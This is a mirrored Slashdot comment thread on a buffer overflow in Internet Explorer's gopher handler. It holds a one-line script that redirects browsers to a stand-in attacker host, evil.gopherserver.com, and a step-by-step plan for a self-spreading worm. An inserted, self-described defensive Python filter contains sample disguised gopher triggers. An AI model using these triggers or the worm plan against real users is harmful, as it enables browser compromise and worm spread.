Slashdot Mirror


Latest IE Hole Lets Gopher Root You

rvaniwaa writes "Another hole in Internet Explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected and a Microsoft spokesman stated that the company is "moving forward on the investigation with all due speed""

23 of 533 comments

  1. My thoughts: by FortKnox · · Score: 2, Insightful

    Written in one of my journal entries.

    See if this story follows pattern (I think it will).

    --
    Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!

    1. Re:My thoughts: by sphealey · · Score: 5, Insightful

      > The existence of the exploit in the first place is troubling, but the *really serious* problem is #3, where almost nobody installs the patch until it is too late. Basically, Microsoft may not care as much about security as the security experts do, but the sad truth is that many users and even sysadmins care even less.

      Well, yes. OTOH, you missed Step 3a, where the Microsoft patch breaks numerous mission-critical non-Microsoft applications. Office 97 SP2 was a classic here: Novell Netware clients never worked the same after that one was installed. Necessary for security I am sure. And NT SP6, which broke Lotus Notes.

      You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?

      sPh

  2. Re:All three gopher links left.. by linderdm · · Score: 5, Insightful

    I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disguising their gopher links to look like regular hrefs?

  3. Re:...and yet by Fantanicity · · Score: 2, Insightful

    When are the writers of other browsers going to release the documentation proving that the gopher handling code has been security audited, that sufficient gopher testcases have been built, and that the browser passed all the gopher handling tests?

    The reason there aren't reports of security holes in gopher code in other browsers is that no-one has looked, not that the holes don't exist.

  4. Or... by Robber+Baron · · Score: 2, Insightful

    Don't use IE!

    --

    You're using her as bait, Master!

    1. Re:Or... by Jucius+Maximus · · Score: 3, Insightful
      "Don't use IE!"

      I wish it was that simple. There are hordes of people out there who have jobs where if they install anything on their work computer they will get in trouble.

      I am one of these people. I have no choice but to use MSIE and Outlook on NT at work.

      I feel so dirty.

      And thus the previous comments about blocking gopher are important to many.

  5. **Sigh...** by TweeKinDaBahx · · Score: 2, Insightful

    Most of the other browsers have security holes found in them from time to time as well, but most of the kind crackers out there seem to take a diabolical pleasure in focusing on IE (and since it's one of the core technologies of it, Windows...). If people spent as much time trying to break many of the other browsers out there, I'm sure they would find they're all their own brand of Swiss cheese.

    No software is rock solid, even when it's written to be. There's always a European teenager with way too much time on their hands just waiting to turn your Titanium fortress into a window screen...

    1. Re:**Sigh...** by Jeremi · · Score: 3, Insightful

      > No software is rock solid, even when it's written to be

      Perhaps so, but avoiding buffer overflows isn't rocket science. It's a simple matter of bounds checking. There's really no excuse.

      --
      I don't care if it's 90,000 hectares. That lake was not my doing.

  6. Re:And how's that working for ya? by liquidsin · · Score: 4, Insightful

    Hey, cut them some slack. It only took five months to find a hole in a protocol that nobody's used in...what...seven, eight years? We should have all the IE/Outlook bugs patched up sometime around 2026.

    --
    do not read this line twice.

  7. Not necessarily... by Andy+Dodd · · Score: 1, Insightful

    The gopher URL is most likely bogus to begin with. Processing the URL is what roots you, not connecting to the actual Gopher site. i.e. you need a proxy that filters out all Gopher links from the HTML to keep them from ever reaching your browser (Just like the only way to protect Outlook from some classes of worms is server-side filtering)

    --
    retrorocket.o not found, launch anyway?

  8. Re:All three gopher links left.. by kesuki · · Score: 5, Insightful

    nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.
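
A defender-side filter of the kind Andy Dodd describes above (a proxy that strips gopher: links out of HTML before it reaches the browser), extended to catch the disguised links and script redirects linderdm and kesuki mention. This is an added example, not code from the thread or from any product; the sample page, the example.test hostnames and the function names are constructed for the demonstration.

```python
import html
import re

# Attribute values that can carry a URL, including <meta http-equiv="refresh" content="0;url=...">
_ATTR_RE = re.compile(r'\b(href|src|action|content)\s*=\s*(?:(["\'])(.*?)\2|([^\s>]+))',
                      re.IGNORECASE | re.DOTALL)
_SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script\s*>', re.IGNORECASE | re.DOTALL)
_JS_STR_RE = re.compile(r'(["\'])((?:\\.|(?!\1).)*)\1', re.DOTALL)  # JS string literals

def is_gopher_url(raw):
    """True if the value resolves to a gopher: URL once obfuscation is undone."""
    value = html.unescape(raw)                          # &#103;opher -> gopher
    value = re.sub(r'[\x00-\x20]', '', value).lower()   # URL parsers drop tab/newline, trim space
    return re.match(r'(?:\d+;url=)?gopher:', value) is not None  # plain or meta-refresh form

def filter_gopher_links(page):
    """Return (filtered_html, count) with every gopher: reference neutralised.
    Best effort, not a JS parser: a script is dropped whole if any string literal
    in it is a gopher: URL, but pieces joined at runtime are not reconstructed."""
    count = 0

    def drop_script(m):
        nonlocal count
        if any(is_gopher_url(s.group(2)) for s in _JS_STR_RE.finditer(m.group(1))):
            count += 1
            return '<!-- script removed by link filter -->'
        return m.group(0)

    def blank_attr(m):
        nonlocal count
        value = m.group(3) if m.group(3) is not None else m.group(4)
        if not is_gopher_url(value):
            return m.group(0)
        count += 1
        quote = m.group(2) or '"'
        return f'{m.group(1)}={quote}about:blank{quote}'

    page = _SCRIPT_RE.sub(drop_script, page)   # scripts first, then plain attributes
    page = _ATTR_RE.sub(blank_attr, page)
    return page, count

# Constructed sample (not from the article): four disguised gopher references, one ordinary link
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0;url=GOPHER://example.test:7000/x">
<script>document.location.replace("gop\ther://example.test:7000/overflow/");</script>
</head><body>
<a href="http://example.test/page">normal link</a>
<a href="&#103;opher://example.test/">looks like an ordinary link</a>
<img src=gopher://example.test/img.gif>
</body></html>"""
```

Running `filter_gopher_links(SAMPLE_PAGE)` neutralises all four references (meta refresh, script, entity-encoded href, unquoted img src) and leaves the HTTP link untouched.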

  9. Re:Too damn obvious by Jucius+Maximus · · Score: 5, Insightful

    Just one question:

    Why the h3ll is anyone motivated to find bugs in IE's gopher protocols?!? It must have been a real slow day at Oy Online Solutions for them to find this.

  10. Re:All three gopher links left.. by Anonymous Coward · · Score: 1, Insightful

    It is a very light protocol, there was some talk of using it for phones instead of the awful WAP junk

  11. What the hell is this about? by drew_kime · · Score: 5, Insightful

    > A Microsoft spokesman who refused to be identified said Tuesday ...

    And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

    > Refusing to confirm the security flaw, the Microsoft spokesman said the company "feel(s) strongly that speculating on the issue while the investigation is in progress would be irresponsible and counterproductive to our goal of protecting our customers' information."

    > And the spokesman added, "Responsible security researchers work with the vendor of a suspected vulnerability issue to ensure that countermeasures are developed before the issue is made public and customers are needlessly put at risk."

    So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

    So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?

    --
    Nope, no sig

  12. I.E. helps terrorists by NinjaWorm · · Score: 2, Insightful

    LOL this story after reading that crap about Open Source helping terror.

    Who needs a patch? just download OPRA and bam fixed.

  13. Re:The remedy by indiigo · · Score: 1, Insightful

    better yet just block port 70 on the firewall. No one uses it anymore. This is one protocol that is deader than a doornail, and the solution takes a firewall admin probably less than a minute.

    --
    fslg503-985-8686503-985-8686503-985-8686503-985-86 8650 3-985-fdsg8686503-985-8686503-985-8686503-9

  14. Buffer overflow, buffer overflow, buffer overflow by dpbsmith · · Score: 3, Insightful

    ...why do they have to find and fix them one by one? Can't they switch to a programming language, or debugging tool, or run-time library, that would find and fix all of them?

    Indeed, about the time Windows 2000 was released with 65536 known bugs (or whatever the exact number was), didn't Jim Allchin say that they had such a tool and were using it?

    Should buffer overflows be as outdated as Gopher itself?

  15. Re:Wow... by Gerv · · Score: 5, Insightful

    > most important of these that gopher is absolutely archaic.

    <script>
    document.location.replace("gopher://evil.gopherserver.com:7000/buffer_overflow/");
    </script>

    > Second, as always, Microsoft will have a patch out fairly quickly, which is more than can be said for mozilla half of the time...

    I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

    Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?

    Gerv

  16. Even tho gopher is dead, this is a problem by joshv · · Score: 5, Insightful

    Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malicious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.

    A smart worm could:
    1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
    2. Open up a dummy gopher port which responds to all requests with the exploit.
    3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
    4. The worm installs itself on all client machines that click the gopher links and begins scanning for vulnerable servers.
    5. Goto 1.

    None of this has anything to do with the number of gopher servers left on the Internet.

    -josh

  17. For all of you slamming MS by kraf · · Score: 3, Insightful

    They don't care.

    Yeah, they made some PR stunts concerning security, but until stuff like this starts affecting their bottom line, they won't care.
    There are just too many morons out there buying their stuff, so the situation won't change anytime soon.

    And don't give me that crap about being forced into using it. No one is going to hold a gun against your head and say: use explorer or die.
    If your employer makes you use stuff you hate, then you're just a lame pushover and you deserve what you get.

  18. Re:All three gopher links left.. by phayes · · Score: 2, Insightful

    Gopher was a protocol devised to replace FTP. Anyone who has ever taken a look at the protocol FTP uses or set up a firewall knows how crufty FTP is (FTP needs 2 ports, a get implies a connection from the server to the client, etc).

    Gopher had the advantage of a clean protocol & easy to use clients.

    FTP had the advantage of being widely deployed.

    Had not prettified clients like web browsers come along at the time they did, ftp was doomed, but once the clients were easy enough to use there wasn't enough incentive to replace crufty old FTP.

    --
    Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue

  19. Re:What's worse? by stinky+wizzleteats · · Score: 3, Insightful

    Ah, the ubiquitous inevitability argument.

    That argument is, of course, bullshit. Use of a modern HTML DTD such as 4.01 strict enforces consistent behavior on the client side. Javascript may still be a problem, but handicapped accessibility guidelines will require that content be delivered without its use.

    There was a time where I could not browse the web with anything but IE because of the MS incited erosion of HTML standards. But the resurgence of attention to those standards, combined with a significant and growing user population using non IE browsers, has forced most web sites to un-adapt from the de facto Microsoft standard.

    As for Opera specifically, it is the only browser out there which consistently obeys pre-HTML 4.01 strict DTDs. I am a paying user of Opera, and use it on all my GUI systems.

  20. Re:Too damn obvious by btellier · · Score: 4, Insightful

    You're looking at security research backwards. When I do security audits, particularly closed-source ones, I look at the more "obscure" features first. The benefits to this are numerous:

    - The program's maintainers are less likely to check these portions of code for errors because users don't complain about them as much.

    - The legacy protocols probably contain code from the pre-security awareness days. They're more likely to contain such "new" security concerns as Format String bugs and signed/unsigned conversions.

    - Other people doing audits on the same software have probably been over all the basics many times using automated tools and buffer overflow spamming.

    I know the above post was probably meant as a joke, but the guys above are probably more clever than you think.